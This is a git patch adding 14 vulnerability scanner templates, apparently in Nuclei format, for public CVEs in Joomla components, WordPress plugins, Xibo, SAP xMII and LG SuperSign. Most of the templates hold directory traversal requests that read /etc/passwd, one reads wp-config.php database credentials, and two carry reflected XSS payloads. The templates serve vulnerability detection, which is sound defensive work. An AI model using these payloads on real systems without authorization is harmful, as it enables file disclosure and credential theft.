From c6dbad9e0288ab6de250a8f04acf81da26c46db2 Mon Sep 17 00:00:00 2001 From: daffainfo Date: Thu, 19 Aug 2021 17:29:24 +0700 Subject: [PATCH] Adding new template --- CVE-2008-4764.yaml | 27 +++++++++++++++++++++++++++ CVE-2010-0944.yaml | 27 +++++++++++++++++++++++++++ CVE-2010-1979.yaml | 27 +++++++++++++++++++++++++++ CVE-2010-1983.yaml | 27 +++++++++++++++++++++++++++ CVE-2010-2259.yaml | 27 +++++++++++++++++++++++++++ CVE-2010-2682.yaml | 27 +++++++++++++++++++++++++++ CVE-2011-4804.yaml | 27 +++++++++++++++++++++++++++ CVE-2013-5979.yaml | 28 ++++++++++++++++++++++++++++ CVE-2014-4940.yaml | 25 +++++++++++++++++++++++++ CVE-2014-5368.yaml | 29 +++++++++++++++++++++++++++++ CVE-2016-1000139.yaml | 33 +++++++++++++++++++++++++++++++++ CVE-2016-1000146.yaml | 29 +++++++++++++++++++++++++++++ CVE-2016-2389.yaml | 27 +++++++++++++++++++++++++++ CVE-2018-16288.yaml | 27 +++++++++++++++++++++++++++ 14 files changed, 387 insertions(+) create mode 100755 CVE-2008-4764.yaml create mode 100755 CVE-2010-0944.yaml create mode 100755 CVE-2010-1979.yaml create mode 100755 CVE-2010-1983.yaml create mode 100755 CVE-2010-2259.yaml create mode 100755 CVE-2010-2682.yaml create mode 100755 CVE-2011-4804.yaml create mode 100755 CVE-2013-5979.yaml create mode 100755 CVE-2014-4940.yaml create mode 100755 CVE-2014-5368.yaml create mode 100755 CVE-2016-1000139.yaml create mode 100755 CVE-2016-1000146.yaml create mode 100755 CVE-2016-2389.yaml create mode 100755 CVE-2018-16288.yaml diff --git a/CVE-2008-4764.yaml b/CVE-2008-4764.yaml new file mode 100755 index 0000000..4435b80 --- /dev/null +++ b/CVE-2008-4764.yaml @@ -0,0 +1,27 @@ +id: CVE-2008-4764 + +info: + name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. + reference: | + - https://www.exploit-db.com/exploits/5435 + - https://www.cvedetails.com/cve/CVE-2008-4764 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/CVE-2010-0944.yaml b/CVE-2010-0944.yaml new file mode 100755 index 0000000..fed06bf --- /dev/null +++ b/CVE-2010-0944.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-0944 + +info: + name: Joomla! Component com_jcollection - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/11088 + - https://www.cvedetails.com/cve/CVE-2010-0944 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/CVE-2010-1979.yaml b/CVE-2010-1979.yaml new file mode 100755 index 0000000..21d8522 --- /dev/null +++ b/CVE-2010-1979.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1979 + +info: + name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12088 + - https://www.cvedetails.com/cve/CVE-2010-1979 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/CVE-2010-1983.yaml b/CVE-2010-1983.yaml new file mode 100755 index 0000000..c72666c --- /dev/null +++ b/CVE-2010-1983.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1983 + +info: + name: Joomla! Component redTWITTER 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php + reference: | + - https://www.exploit-db.com/exploits/12055 + - https://www.cvedetails.com/cve/CVE-2010-1983 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/CVE-2010-2259.yaml b/CVE-2010-2259.yaml new file mode 100755 index 0000000..3114b7d --- /dev/null +++ b/CVE-2010-2259.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2259 + +info: + name: Joomla! Component com_bfsurvey - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/10946 + - https://www.cvedetails.com/cve/CVE-2010-2259 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/CVE-2010-2682.yaml b/CVE-2010-2682.yaml new file mode 100755 index 0000000..11ae257 --- /dev/null +++ b/CVE-2010-2682.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2682 + +info: + name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/14017 + - https://www.cvedetails.com/cve/CVE-2010-2682 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/CVE-2011-4804.yaml b/CVE-2011-4804.yaml new file mode 100755 index 0000000..b159420 --- /dev/null +++ b/CVE-2011-4804.yaml @@ -0,0 +1,27 @@ +id: CVE-2011-4804 + +info: + name: Joomla! Component com_kp - 'Controller' Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/36598 + - https://www.cvedetails.com/cve/CVE-2011-4804 + tags: cve,cve2011,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/CVE-2013-5979.yaml b/CVE-2013-5979.yaml new file mode 100755 index 0000000..83ee111 --- /dev/null +++ b/CVE-2013-5979.yaml @@ -0,0 +1,28 @@ +id: CVE-2013-5979 + +info: + name: Xibo 1.2.2/1.4.1 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/26955 + - https://www.cvedetails.com/cve/CVE-2013-5979 + - https://bugs.launchpad.net/xibo/+bug/1093967 + tags: cve,cve2013,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/CVE-2014-4940.yaml b/CVE-2014-4940.yaml new file mode 100755 index 0000000..a2d4666 --- /dev/null +++ b/CVE-2014-4940.yaml @@ -0,0 +1,25 @@ +id: CVE-2014-4940 + +info: + name: WordPress Plugin Tera Charts - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. + reference: https://www.cvedetails.com/cve/CVE-2014-4940 + tags: cve,cve2014,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/CVE-2014-5368.yaml b/CVE-2014-5368.yaml new file mode 100755 index 0000000..9b0bd4e --- /dev/null +++ b/CVE-2014-5368.yaml @@ -0,0 +1,29 @@ +id: CVE-2014-5368 + +info: + name: WordPress Plugin WP Content Source Control - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. + reference: | + - https://www.exploit-db.com/exploits/39287 + - https://www.cvedetails.com/cve/CVE-2014-5368 + tags: cve,cve2014,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php" + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/CVE-2016-1000139.yaml b/CVE-2016-1000139.yaml new file mode 100755 index 0000000..3053e62 --- /dev/null +++ b/CVE-2016-1000139.yaml @@ -0,0 +1,33 @@ +id: CVE-2016-1000139 + +info: + name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139 + tags: cve,cve2016,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - '"><"' + - 'input type="text" name="ContactId"' + condition: and + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2016-1000146.yaml b/CVE-2016-1000146.yaml new file mode 100755 index 0000000..b45691d --- /dev/null +++ b/CVE-2016-1000146.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000146 + +info: + name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2016-2389.yaml b/CVE-2016-2389.yaml new file mode 100755 index 0000000..52a02ca --- /dev/null +++ b/CVE-2016-2389.yaml @@ -0,0 +1,27 @@ +id: CVE-2016-2389 + +info: + name: SAP xMII 15.0 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978. + reference: | + - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/ + - https://www.cvedetails.com/cve/CVE-2016-2389 + tags: cve,cve2016,lfi,sap + +requests: + - method: GET + path: + - "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/CVE-2018-16288.yaml b/CVE-2018-16288.yaml new file mode 100755 index 0000000..7f8f868 --- /dev/null +++ b/CVE-2018-16288.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-16288 + +info: + name: LG SuperSign EZ CMS 2.5 - Local File Inclusion + author: daffainfo + severity: high + description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs. + reference: | + - https://www.exploit-db.com/exploits/45440 + - https://www.cvedetails.com/cve/CVE-2018-16288 + tags: cve,cve2018,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200